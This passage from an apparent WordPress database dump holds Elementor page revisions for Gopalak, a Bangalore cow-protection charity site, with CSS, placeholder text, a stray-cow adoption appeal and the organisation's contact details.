.elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 11:45:08','2022-10-11 06:15:08','',1373,'https://gopalak.in/?p=1617',0,'revision','',0),(1618,1,'2022-10-11 11:45:08','2022-10-11 06:15:08','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 11:45:08','2022-10-11 06:15:08','',1373,'https://gopalak.in/?p=1618',0,'revision','',0),(1619,1,'2022-10-11 11:45:08','2022-10-11 06:15:08','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/logo1211-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/logo1211-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/logo1211-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 11:45:08','2022-10-11 06:15:08','',1373,'https://gopalak.in/?p=1619',0,'revision','',0),(1624,1,'2022-10-11 15:04:50','0000-00-00 00:00:00','','Elementor #1624','','draft','closed','closed','','','','','2022-10-11 15:04:50','2022-10-11 09:34:50','',0,'https://gopalak.in/?page_id=1624',0,'page','',0),(1625,1,'2022-10-11 15:01:50','2022-10-11 09:31:50','','Elementor #1624','','inherit','closed','closed','','1624-revision-v1','','','2022-10-11 15:01:50','2022-10-11 09:31:50','',1624,'https://gopalak.in/?p=1625',0,'revision','',0),(1626,1,'2022-10-11 15:13:28','2022-10-11 09:43:28','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n			<a href=\"https://gopalak.in/campaigns/cattle-feed/\" role=\"button\">\n						Donate\n					</a>\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>','Adopt/Donate','','publish','closed','closed','','adopt-donate','','','2022-10-14 17:21:20','2022-10-14 11:51:20','',0,'https://gopalak.in/?page_id=1626',0,'page','',0),(1627,1,'2022-10-11 15:07:59','2022-10-11 09:37:59','','Elementor #1626','','inherit','closed','closed','','1626-revision-v1','','','2022-10-11 15:07:59','2022-10-11 09:37:59','',1626,'https://gopalak.in/?p=1627',0,'revision','',0),(1628,1,'2022-10-11 15:09:11','2022-10-11 09:39:11','','Contribute-1234','','inherit','open','closed','','contribute-1234','','','2022-10-11 15:09:11','2022-10-11 09:39:11','',1626,'https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234.png',0,'attachment','image/png',0),(1629,1,'2022-10-11 15:16:04','2022-10-11 09:46:04','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>','Elementor #1626','','inherit','closed','closed','','1626-revision-v1','','','2022-10-11 15:16:04','2022-10-11 09:46:04','',1626,'https://gopalak.in/?p=1629',0,'revision','',0),(1630,1,'2022-10-11 15:16:04','2022-10-11 09:46:04','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>','Elementor #1626','','inherit','closed','closed','','1626-revision-v1','','','2022-10-11 15:16:04','2022-10-11 09:46:04','',1626,'https://gopalak.in/?p=1630',0,'revision','',0),(1631,1,'2022-10-11 15:16:04','2022-10-11 09:46:04','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-1234-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n			<a href=\"#\" role=\"button\">\n						Donate\n					</a>\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>','Elementor #1626','','inherit','closed','closed','','1626-revision-v1','','','2022-10-11 15:16:04','2022-10-11 09:46:04','',1626,'https://gopalak.in/?p=1631',0,'revision','',0),(1632,1,'2022-10-11 15:20:04','2022-10-11 09:50:04','<style>/*! elementor - v3.7.8 - 02-10-2022 